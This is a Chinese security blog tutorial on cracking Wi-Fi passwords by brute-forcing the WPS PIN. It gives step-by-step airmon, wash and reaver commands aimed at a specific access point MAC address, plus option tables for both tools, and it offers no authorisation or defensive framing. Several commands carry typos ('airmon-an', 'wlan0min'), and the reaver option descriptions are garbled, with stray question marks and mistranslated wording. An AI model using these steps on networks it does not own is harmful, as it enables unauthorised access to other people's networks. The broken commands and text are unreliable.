蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > 无线安全 >

通过PIN码破解无线密码

由于WPS存在安全问题,通过PIN码可以直接提取上网密码。而pin码是一个8位的整数,破解过程时间比较短。WPS PIN码的第8位数是一个校验和,因此黑客只需计算前7位数。另外前7位中的前四位和后三位分开认证。所以破解pin码最多只需要1.1万次尝试,顺利的情况下在3小时左右。
 
1.开启无线网卡的监听模式

airmon-an start wlan0

2.通过wash扫描开启了wps的无线ap。

wash -i wlan0min -C

wash参数:
-c, --channel=<num>     信道 默认自动
-o, --out-file=<file>    导出扫描结果
-n, --probes=<num>   扫描附件ap的数量
-D, --daemonize        
-C, --ignore-fcs   忽略帧校验和错误
-5, --5ghz           使用5G频段通道
-s, --scan           使用扫描模式
-u, --survey          使用调查模式默认此项
-P, --output-piped    
-g, --get-chipset                
-h, --help            显示帮助
PIN码破解 - sn0w - 雪花 - sn0w
 
 
3.穷举破解pin码。
reaver -i wlan0mon -b C8:3A:35:43:FE:60 -a -S  -vv -c 1
reaver参数:

 

 -i	 监听后接口称号? ? ? ?
 -b 	APmac地址? ? ? ?
 -a 	主动检测AP最佳配置? ? ? ?
 -S 	利用最小的DH key(能够进步PJ速度)? ? ? ?
 -v-vv 	显示更多的破解信息? ? ? ?
 -d	 delay每穷举一次的闲置时候预设为1秒? ? ? ?
 -t 	timeout每次穷举守候反应的最长时候? ? ? ?
 -c	指定频道能够便当找到信号,如-c1 指定1频道
(责任编辑:蜗蜗侠)